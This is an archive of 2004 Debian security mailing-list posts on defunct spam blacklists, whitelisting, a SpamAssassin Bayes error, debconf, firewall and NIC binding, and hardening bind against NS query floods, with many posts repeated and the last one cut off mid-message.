On Sun, Jun 13, 2004 at 06:33:13PM +0100, Adam D. Barratt wrote: > I'd guess that was easier than fixing all the references to the RBL[+], > RSS and DUL littered through the documentation. Point taken... but then again, who on Earth actually re-reads the whole doc a second time, rather than just a search for a specific keyword? I've tried a couple times. Puts me right to sleep :-) -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: rbl's status?
On Sun, Jun 13, 2004 at 07:46:15PM +0300, Vassilii Khachaturov wrote: > I believe it's very old news, smth like 4-5 years or so. I'd not thought about it because they are still used in the examples all over specs.txt. Perhaps I should email Philip about it. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: rbl's status?
On Sun, Jun 13, 2004 at 12:54:11PM -0400, Noah Meyerhans wrote: > On Sun, Jun 13, 2004 at 07:46:15PM +0300, Vassilii Khachaturov wrote: > > > What are the recommended rbl's these days? > > > > Best thing is ask on NANAE or exim-users or whatever your favourite MTA is. > > Here's what I am using here RBL-wise: > > > > rbl_domains = bl.spamcop.net/reject : > > relays.osirusoft.com/reject :spamhaus.relays.osirusoft.com/reject : > > sbl.spamhaus.org/reject > > You do realize that the osirusoft blacklists are defunct and have been > for several months, right? Basing your decision of whether or not to > accept mail from a given host based on an answer from a defunct > blacklist is probably not a good idea. At least he's more up to date than I! :-) -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
rbl's status?
I just noticed that my exim4 config access to rbl.mail-abuse.org is no longer valid. I'd heard Vixie had 'gone pro' but hadn't thought much about it. What are the recommended rbl's these days? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Spam fights
On Fri, Jun 11, 2004 at 08:39:12PM +1000, Russell Coker wrote: > It won't work because challenge-response systems are technically no good. > While CR systems are almost never used because the people who use them are > universally regarded as cretins, the spammers won't bother about trying to > fool them. First of all, keep in mind that I am strictly talking about people for whom email is an office tool equivalent to the paper mail coming into their physical inbox. They don't know how the US/B/other/PO gets it there and don't care. That said, those who can afford it will hire human operators to act as email gatekeepers; those who can't will use whatever a salesman can convince them is affordable and works. Whether we like it or not will not figure into the decision. I already whitelist; unless I have manually pre-cleared you, I won't see your mail for some time. Basically until I have time to wade thorugh the sludge, assuming I'm not back from a trip and just look for one or two expected mails before deleting. I imagine I'm not alone. CR may not be the solution, but more and more people are only taking pre-authorized (whitelist) mail. If your business requires recieving unsolicted email, then your business model will include the wages of a presorter. They are cheaper than a knowledgeable mail admin. As to the "type in this random code from a jpeg", I use that on samizdata (a major blog for which I'm one of the editors). It stopped the problem of blog-spam cold; the human entry is stopped cold by having a team of writers who delete on sight. At the end of the day, dealing with spam is an employment opportunity, not something that will be solved technically. Human problems require human solutions. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Spam fights
On Fri, Jun 11, 2004 at 08:39:12PM +1000, Russell Coker wrote: > It won't work because challenge-response systems are technically no good. > While CR systems are almost never used because the people who use them are > universally regarded as cretins, the spammers won't bother about trying to > fool them. First of all, keep in mind that I am strictly talking about people for whom email is an office tool equivalent to the paper mail coming into their physical inbox. They don't know how the US/B/other/PO gets it there and don't care. That said, those who can afford it will hire human operators to act as email gatekeepers; those who can't will use whatever a salesman can convince them is affordable and works. Whether we like it or not will not figure into the decision. I already whitelist; unless I have manually pre-cleared you, I won't see your mail for some time. Basically until I have time to wade thorugh the sludge, assuming I'm not back from a trip and just look for one or two expected mails before deleting. I imagine I'm not alone. CR may not be the solution, but more and more people are only taking pre-authorized (whitelist) mail. If your business requires recieving unsolicted email, then your business model will include the wages of a presorter. They are cheaper than a knowledgeable mail admin. As to the "type in this random code from a jpeg", I use that on samizdata (a major blog for which I'm one of the editors). It stopped the problem of blog-spam cold; the human entry is stopped cold by having a team of writers who delete on sight. At the end of the day, dealing with spam is an employment opportunity, not something that will be solved technically. Human problems require human solutions. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Spam fights
On Fri, Jun 11, 2004 at 10:45:44AM +1000, Russell Coker wrote: > It is anti-social for every idiot on the net to think that they are important > enough to require a subscription from everyone who wants to send them email. Like it or not (and I don't) that is where we are headed if other solutions to spam are not implimented that cover non-NANOG type persons. I strongly suspect we'll see a generation of mail systems which greylist by default at the very least. Perhaps a future secreterial job will be to wade through the muck and query the boss as to whether one or two should be allowed access. For some people, even the volume of non-spam mail could be rather intolerable. Imagine if you were Tom Hanks and your private email got out and you had to go through thousands of adoring fan mails to find that movie contract from your agent... Pre-authorization for email is the way things are going to go. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Spam fights
On Fri, Jun 11, 2004 at 10:45:44AM +1000, Russell Coker wrote: > It is anti-social for every idiot on the net to think that they are important > enough to require a subscription from everyone who wants to send them email. Like it or not (and I don't) that is where we are headed if other solutions to spam are not implimented that cover non-NANOG type persons. I strongly suspect we'll see a generation of mail systems which greylist by default at the very least. Perhaps a future secreterial job will be to wade through the muck and query the boss as to whether one or two should be allowed access. For some people, even the volume of non-spam mail could be rather intolerable. Imagine if you were Tom Hanks and your private email got out and you had to go through thousands of adoring fan mails to find that movie contract from your agent... Pre-authorization for email is the way things are going to go. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Problem with Spam Assassin
Has anyone else been seeing this problem with spamassasin?
sa-learn --spam --mbox spambox
Argument "\008566332M-XM-yM-@@" isn't numeric in numeric lt (<) at
/usr/share/perl5/Mail/SpamAssassin/BayesStore.pm line 1267.
|
|
for pages and pages and pages
The lines in question are:
# Make sure to check for either !defined or "" ... Apparently
# sometimes the DB module doesn't return the value correctly. :(
my $oldmagic = $self->{db_toks}->{$OLDEST_TOKEN_AGE_MAGIC_TOKEN};
--> if (!defined ($oldmagic) || $oldmagic eq "" || $atime < $oldmagic) {
$self->{db_toks}->{$OLDEST_TOKEN_AGE_MAGIC_TOKEN} = $atime;
--
--
Dale Amon [EMAIL PROTECTED]+44-7802-188325
International linux systems consultancy
Hardware & software system design, security
and networking, systems programming and Admin
"Have Laptop, Will Travel"
--
Problem with Spam Assassin
Has anyone else been seeing this problem with spamassasin?
sa-learn --spam --mbox spambox
Argument "\008566332M-XM-yM-@@" isn't numeric in numeric lt (<) at
/usr/share/perl5/Mail/SpamAssassin/BayesStore.pm line 1267.
|
|
for pages and pages and pages
The lines in question are:
# Make sure to check for either !defined or "" ... Apparently
# sometimes the DB module doesn't return the value correctly. :(
my $oldmagic = $self->{db_toks}->{$OLDEST_TOKEN_AGE_MAGIC_TOKEN};
--> if (!defined ($oldmagic) || $oldmagic eq "" || $atime < $oldmagic) {
$self->{db_toks}->{$OLDEST_TOKEN_AGE_MAGIC_TOKEN} = $atime;
--
--
Dale Amon [EMAIL PROTECTED]+44-7802-188325
International linux systems consultancy
Hardware & software system design, security
and networking, systems programming and Admin
"Have Laptop, Will Travel"
--
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: how debconf manages passwds
On Wed, Jun 02, 2004 at 12:19:35AM -0700, Matt Zimmerman wrote: > On Wed, May 26, 2004 at 07:33:12PM +0200, jorge salamero wrote: > > > yes but ... > > > > /usr/sbin/dpkg-reconfigure: cacti is not fully installed > > man dpkg-reconfigure Or else just manually edit the debian registry ;-) /var/cache/debconf/config.dat -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: how debconf manages passwds
On Wed, Jun 02, 2004 at 12:19:35AM -0700, Matt Zimmerman wrote: > On Wed, May 26, 2004 at 07:33:12PM +0200, jorge salamero wrote: > > > yes but ... > > > > /usr/sbin/dpkg-reconfigure: cacti is not fully installed > > man dpkg-reconfigure Or else just manually edit the debian registry ;-) /var/cache/debconf/config.dat -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Server slowdown...
On Wed, Apr 14, 2004 at 11:20:49PM +0200, Jaroslaw Tabor wrote: > I'm almost sure that this is software problem. The machine is working > without hardware changes for years, and it didn't happend before. > The only changes I did, are software updates (from debian-security) > and kernel upgrade after last holes were discovered. It sounds like a slow memory leak to me. I had the same problem years and years ago... it finally sorted itself out with another upgrade a year later. They can be the devil to find. Are you getting any disk thrashing as it approaches 'death'? -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Server slowdown...
On Wed, Apr 14, 2004 at 11:20:49PM +0200, Jaroslaw Tabor wrote: > I'm almost sure that this is software problem. The machine is working > without hardware changes for years, and it didn't happend before. > The only changes I did, are software updates (from debian-security) > and kernel upgrade after last holes were discovered. It sounds like a slow memory leak to me. I had the same problem years and years ago... it finally sorted itself out with another upgrade a year later. They can be the devil to find. Are you getting any disk thrashing as it approaches 'death'? -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Slightly OT: Setting the primary NIC
On Sun, Mar 21, 2004 at 10:20:06AM +0100, Sven Riedel wrote: > I'm struggeling with a problem on a multi-homed host running debian, and Well, it's not actually multi-homed. I'll bet both of your NIC's are contained inside the same ASN and that they aren't even running BGP ;-) > Anyway, the Host has an internal NIC and an external NIC (acting among > other things as a firewall). For some reason, all services think the > external NIC is the primary, and will try to bind to that/all requests > from samba/cups etc have a source IP from the external NIC, which > complicates the setups of the internal hosts. Many daemons have config statements for binding to particular ports. You'll have to set them up on a case by case basis. Most of them will bind by default to all ip's defined for the host. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Slightly OT: Setting the primary NIC
On Sun, Mar 21, 2004 at 10:20:06AM +0100, Sven Riedel wrote: > I'm struggeling with a problem on a multi-homed host running debian, and Well, it's not actually multi-homed. I'll bet both of your NIC's are contained inside the same ASN and that they aren't even running BGP ;-) > Anyway, the Host has an internal NIC and an external NIC (acting among > other things as a firewall). For some reason, all services think the > external NIC is the primary, and will try to bind to that/all requests > from samba/cups etc have a source IP from the external NIC, which > complicates the setups of the internal hosts. Many daemons have config statements for binding to particular ports. You'll have to set them up on a case by case basis. Most of them will bind by default to all ip's defined for the host. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Checking what running program are using old libraries
On Thu, Mar 18, 2004 at 12:03:29PM +0100, Jan Dittberner wrote: > Such a script exists in testing > > package: debian-goodies > filename: /usr/bin/checkrestart Of course you have to do different things for different PID's. Most daemons you can 'restart'. Some you might have to 'stop' and then 'start'. getty's you just kill because init will restart them. You have to logout and reconnect on all your remote ssh sessions. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Checking what running program are using old libraries
While we're on the subject, what is apache doing? apache26756 root memDEL0,5 393216 /SYSV apache26757 www-data memDEL0,5 393216 /SYSV apache26758 www-data memDEL0,5 393216 /SYSV is it opening tmp files and immediately deleting them like mailers do so they vanish if the program dies? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Checking what running program are using old libraries
On Thu, Mar 18, 2004 at 12:03:29PM +0100, Jan Dittberner wrote: > Such a script exists in testing > > package: debian-goodies > filename: /usr/bin/checkrestart Of course you have to do different things for different PID's. Most daemons you can 'restart'. Some you might have to 'stop' and then 'start'. getty's you just kill because init will restart them. You have to logout and reconnect on all your remote ssh sessions. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Checking what running program are using old libraries
While we're on the subject, what is apache doing? apache26756 root memDEL0,5 393216 /SYSV apache26757 www-data memDEL0,5 393216 /SYSV apache26758 www-data memDEL0,5 393216 /SYSV is it opening tmp files and immediately deleting them like mailers do so they vanish if the program dies? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: apt-get upgrade and kernel images
On Fri, Feb 27, 2004 at 10:47:41AM +, Jeremy Sowden wrote:
> > Note that the package name is truncated with "dpkg -l"
> > (cf. dpkg-query...).
>
>
> The truncation can be remedied. I tend to use:
>
> COLUMNS=150 dpkg -l 'kernel-*' | awk '$1 ~ /ii/ { print $0 }'
>
> to check what I've got installed.
These will give you just the name lists:
apt-cache pkgnames
dpkg --get-selections
but not the version info. Useful in some
circumstances.
--
--
Dale Amon [EMAIL PROTECTED]+44-7802-188325
International linux systems consultancy
Hardware & software system design, security
and networking, systems programming and Admin
"Have Laptop, Will Travel"
--
Re: apt-get upgrade and kernel images
On Fri, Feb 27, 2004 at 10:47:41AM +, Jeremy Sowden wrote:
> > Note that the package name is truncated with "dpkg -l"
> > (cf. dpkg-query...).
>
>
> The truncation can be remedied. I tend to use:
>
> COLUMNS=150 dpkg -l 'kernel-*' | awk '$1 ~ /ii/ { print $0 }'
>
> to check what I've got installed.
These will give you just the name lists:
apt-cache pkgnames
dpkg --get-selections
but not the version info. Useful in some
circumstances.
--
--
Dale Amon [EMAIL PROTECTED]+44-7802-188325
International linux systems consultancy
Hardware & software system design, security
and networking, systems programming and Admin
"Have Laptop, Will Travel"
--
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Fwd: Re: [ox-en] Walther
On Wed, Feb 25, 2004 at 06:02:22PM +0200, Martin Hardie wrote: > so the use of debian products for rascist work is ok for debian > by using debian he associates debians products with rascism > > On Wednesday 25 February 2004 17:41, Dale Amon wrote: > > On Wed, Feb 25, 2004 at 04:37:20PM +0200, Martin Hardie wrote: > > > or is good code more important than this sort of stuff? > > > > Yes, as long as his personal beliefs are kept outside > > of Debian. I think a severe warning to keep his politics > > outside of Debian would be sufficient. Debian is useable by anyoen. Let's not go down that road or you'll have everyone trying to decide who is allowed to use what software for what purpose and since practically everyone hates *someone*, the whole endeavour dies. The software is just there for all to use on an equal basis. Even an al Qaeda member can use debian... although I'd shoot them dead on sight if I met them in person. But that would have nothing to do with Debian or Debian use or Debian policy or Debian anything. That's why there are very wise rules in Debian and GPL in general to make software freely available to *all* persons. Why don't we drop this thread and leave it to the list maintainer? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Fwd: Re: [ox-en] Walther
On Wed, Feb 25, 2004 at 04:37:20PM +0200, Martin Hardie wrote: > or is good code more important than this sort of stuff? Yes, as long as his personal beliefs are kept outside of Debian. I think a severe warning to keep his politics outside of Debian would be sufficient. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Fwd: Re: [ox-en] Walther
On Wed, Feb 25, 2004 at 06:02:22PM +0200, Martin Hardie wrote: > so the use of debian products for rascist work is ok for debian > by using debian he associates debians products with rascism > > On Wednesday 25 February 2004 17:41, Dale Amon wrote: > > On Wed, Feb 25, 2004 at 04:37:20PM +0200, Martin Hardie wrote: > > > or is good code more important than this sort of stuff? > > > > Yes, as long as his personal beliefs are kept outside > > of Debian. I think a severe warning to keep his politics > > outside of Debian would be sufficient. Debian is useable by anyoen. Let's not go down that road or you'll have everyone trying to decide who is allowed to use what software for what purpose and since practically everyone hates *someone*, the whole endeavour dies. The software is just there for all to use on an equal basis. Even an al Qaeda member can use debian... although I'd shoot them dead on sight if I met them in person. But that would have nothing to do with Debian or Debian use or Debian policy or Debian anything. That's why there are very wise rules in Debian and GPL in general to make software freely available to *all* persons. Why don't we drop this thread and leave it to the list maintainer? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Fwd: Re: [ox-en] Walther
On Wed, Feb 25, 2004 at 04:37:20PM +0200, Martin Hardie wrote: > or is good code more important than this sort of stuff? Yes, as long as his personal beliefs are kept outside of Debian. I think a severe warning to keep his politics outside of Debian would be sufficient. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: How To Set Up Mail-out-only System ?
On Wed, Feb 11, 2004 at 01:41:13AM +, Nick Boyce wrote: > I've just set up a "secure" (you know .. more than usual) Debian system, > and want to arrange things so that it can send mail out when necessary > (in case anything happens that it thinks I should know about) but is > *not* constantly listening for incoming mail. You could firewall incoming port 25 connections... -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: How To Set Up Mail-out-only System ?
On Wed, Feb 11, 2004 at 01:41:13AM +, Nick Boyce wrote: > I've just set up a "secure" (you know .. more than usual) Debian system, > and want to arrange things so that it can send mail out when necessary > (in case anything happens that it thinks I should know about) but is > *not* constantly listening for incoming mail. You could firewall incoming port 25 connections... -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
cflows and debian
Does anyone know where I can find a cflowd package? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
cflows and debian
Does anyone know where I can find a cflowd package? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Firewall: Need Advice
On Sat, Feb 07, 2004 at 10:38:51AM +0200, E&Erdem wrote: > I've been using iptables (or i assuming that). But at boot time it gives > an error: "Aborting iptables load: unknown rulesets "active" ". I > couldn't find the problem. I searched via google, and found > dpkg-reconfigure iptables. But it didn't help. I read a lot of iptables > documents. But i think i lost some points, because i don't understand > something. Since I do my own firewall from scratch and don't touch the auto-installed stuff, I can only surmise. There may be a script in /etc/init.d/ that is loading a debian default firewall if you selected a package with a default firewall. I seem to remember running across a script that reads on startup and write on stop to a directory in /etc/defaults or something like that. I will also add that if you are going down the route of creating your own frow scratch, make sure you read and re-read the HOWTO's on iptables and firewalling and that you have a good knowledge of routing. However if your requirements are very simple, it is not hard to do a Masquerade firewall. And if you wish to go one step past that and close all outgoing ports and then allow a few specific ones, that also is not very complex. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Firewall: Need Advice
On Sat, Feb 07, 2004 at 10:38:51AM +0200, E&Erdem wrote: > I've been using iptables (or i assuming that). But at boot time it gives > an error: "Aborting iptables load: unknown rulesets "active" ". I > couldn't find the problem. I searched via google, and found > dpkg-reconfigure iptables. But it didn't help. I read a lot of iptables > documents. But i think i lost some points, because i don't understand > something. Since I do my own firewall from scratch and don't touch the auto-installed stuff, I can only surmise. There may be a script in /etc/init.d/ that is loading a debian default firewall if you selected a package with a default firewall. I seem to remember running across a script that reads on startup and write on stop to a directory in /etc/defaults or something like that. I will also add that if you are going down the route of creating your own frow scratch, make sure you read and re-read the HOWTO's on iptables and firewalling and that you have a good knowledge of routing. However if your requirements are very simple, it is not hard to do a Masquerade firewall. And if you wish to go one step past that and close all outgoing ports and then allow a few specific ones, that also is not very complex. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Question on security.debian.org
Any more news on what is wrong with security.debian.org? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Question on security.debian.org
Any more news on what is wrong with security.debian.org? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Query NS
On Sun, Feb 01, 2004 at 03:46:07PM +0100, Hans Spaans wrote:
> You added it globally and to every zone? Also allow-transfer is a nice
> own to get into place. But you will see queries being denied and if you
Yes, I've got allow-transfer groups on all domains; allow-query { any; }
on all domains I server, and an options allow-query group and allow-recursion
group in options so that only authorized sites can use the cache.
> check those IP's you'll see that they don't run any nameserver. So
> don't worry to much.
I'd originally thought otherwise, but as I went through
the trace I found the real name servers were trying to
do a lookup for a dead zone, one I used to host but which
the owner has taken off line. Some fairly big ISP's are
using annoying short Retry times...
> I did but wasn't impressed, only when the new cyberangels was making
> sure we needed to handle an extra 6 a 700 q/s ;-)
I have to be careful though as I get phone calls if
my bandwidth usage goes too high. It got so bad a week
ago (before I put in the blocking) that processes
were dying on my server due to memory starvation (the kernel
was killing processes as resources were being overused),
that I had to risk down time to do something about it.
I'd still be interested to know if anyone knows *why*
so many people are doing this. I know what they are doing;
I can block it; but I'm curious. I've got a gut feeling
it has something to do with spammers hiding their tracks,
but I'm not sure how it would or why it would be useful
to them.
I just can't come up with anything else.
--
--
Dale Amon [EMAIL PROTECTED]+44-7802-188325
International linux systems consultancy
Hardware & software system design, security
and networking, systems programming and Admin
"Have Laptop, Will Travel"
--
Re: Query NS
On Sun, Feb 01, 2004 at 03:46:07PM +0100, Hans Spaans wrote:
> You added it globally and to every zone? Also allow-transfer is a nice
> own to get into place. But you will see queries being denied and if you
Yes, I've got allow-transfer groups on all domains; allow-query { any; }
on all domains I server, and an options allow-query group and allow-recursion
group in options so that only authorized sites can use the cache.
> check those IP's you'll see that they don't run any nameserver. So
> don't worry to much.
I'd originally thought otherwise, but as I went through
the trace I found the real name servers were trying to
do a lookup for a dead zone, one I used to host but which
the owner has taken off line. Some fairly big ISP's are
using annoying short Retry times...
> I did but wasn't impressed, only when the new cyberangels was making
> sure we needed to handle an extra 6 a 700 q/s ;-)
I have to be careful though as I get phone calls if
my bandwidth usage goes too high. It got so bad a week
ago (before I put in the blocking) that processes
were dying on my server due to memory starvation (the kernel
was killing processes as resources were being overused),
that I had to risk down time to do something about it.
I'd still be interested to know if anyone knows *why*
so many people are doing this. I know what they are doing;
I can block it; but I'm curious. I've got a gut feeling
it has something to do with spammers hiding their tracks,
but I'm not sure how it would or why it would be useful
to them.
I just can't come up with anything else.
--
--
Dale Amon [EMAIL PROTECTED]+44-7802-188325
International linux systems consultancy
Hardware & software system design, security
and networking, systems programming and Admin
"Have Laptop, Will Travel"
--
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Query NS
On Sun, Feb 01, 2004 at 02:29:53PM +0100, Hans Spaans wrote: > But than a gain, you can do a joke next month so people have a problem > or you can fix this problem by adding allow-query statements to your > named.conf and forcing people to abuse someone else. Actually that's precisely how I discovered it. I added allow queries and was trying to figure out why I was denying so many queries per second. Others should take a look and see if this is really widespread. I'm getting it from a whole *bunch* of different ip's. I wish I could do the joke, but I have too many real zones that I primary and secondary so I can't really load a phony root.db. I agree with your analysis. It seems like a really stupid thing to do, which is why I am having trouble understanding why so many people are querying me like that. It just doesn't make sense. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Query NS
What is the purpose of a DNS query NS ? It returns to the requester my list of root servers, which seems pointless... and I am getting hit by them at the rate of several a second from various nameservers. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Query NS
On Sun, Feb 01, 2004 at 02:29:53PM +0100, Hans Spaans wrote: > But than a gain, you can do a joke next month so people have a problem > or you can fix this problem by adding allow-query statements to your > named.conf and forcing people to abuse someone else. Actually that's precisely how I discovered it. I added allow queries and was trying to figure out why I was denying so many queries per second. Others should take a look and see if this is really widespread. I'm getting it from a whole *bunch* of different ip's. I wish I could do the joke, but I have too many real zones that I primary and secondary so I can't really load a phony root.db. I agree with your analysis. It seems like a really stupid thing to do, which is why I am having trouble understanding why so many people are querying me like that. It just doesn't make sense. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Query NS
What is the purpose of a DNS query NS ? It returns to the requester my list of root servers, which seems pointless... and I am getting hit by them at the rate of several a second from various nameservers. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Hardening named.conf
Things don't seem to be working quite as expected. I have
something like this now:
acl mydomain {
localhost;
192.168.0.0/24;
10.1.1.0/24;
};
There are many etho:n and I tried it with each ip
specified individually, then added the localhost key
word in addtion.
options {
allow-recursion {
mydomain;
};
};
This seems to do much of what I want... but I am
seeing some things which are a bit dodgy. For instance,
if I run iptstate on the dns server and tell it to resolve
names, I get all the inverse lookups denied.
I now suspect at least some of the 1 or so queries
I've blocked in the last couple hours are valid, but it
is hard to tell amidst the buzzing of the spammers on
the screen door...
I note that another person suggested this is the wrong
technique to use. Would that person say it was better
to do something like:
options {
allow-queries {
mydomain;
};
zone
allow-queries {
all;
};
???
I have to be careful with experimentation because this
is not a toy machine. Not exceedingly busy, but still
a real server doing real serving.
A slightly different problem, which I just started
looking into deeper, is that I have
zone .
allow-transfer {
dnsip1;
dnsip2;
myworkstation;
};
where the object is to allow my workstation to
do host -a -l ... but it doesn't work. Says I
am not a primary or secondary. This is not quite
what I would expect since anyone can transfer if
there is no allow-transfer statement at all.
--
------
Dale Amon [EMAIL PROTECTED]+44-7802-188325
International linux systems consultancy
Hardware & software system design, security
and networking, systems programming and Admin
"Have Laptop, Will Travel"
--
Re: Hardening named.conf
Things don't seem to be working quite as expected. I have
something like this now:
acl mydomain {
localhost;
192.168.0.0/24;
10.1.1.0/24;
};
There are many etho:n and I tried it with each ip
specified individually, then added the localhost key
word in addtion.
options {
allow-recursion {
mydomain;
};
};
This seems to do much of what I want... but I am
seeing some things which are a bit dodgy. For instance,
if I run iptstate on the dns server and tell it to resolve
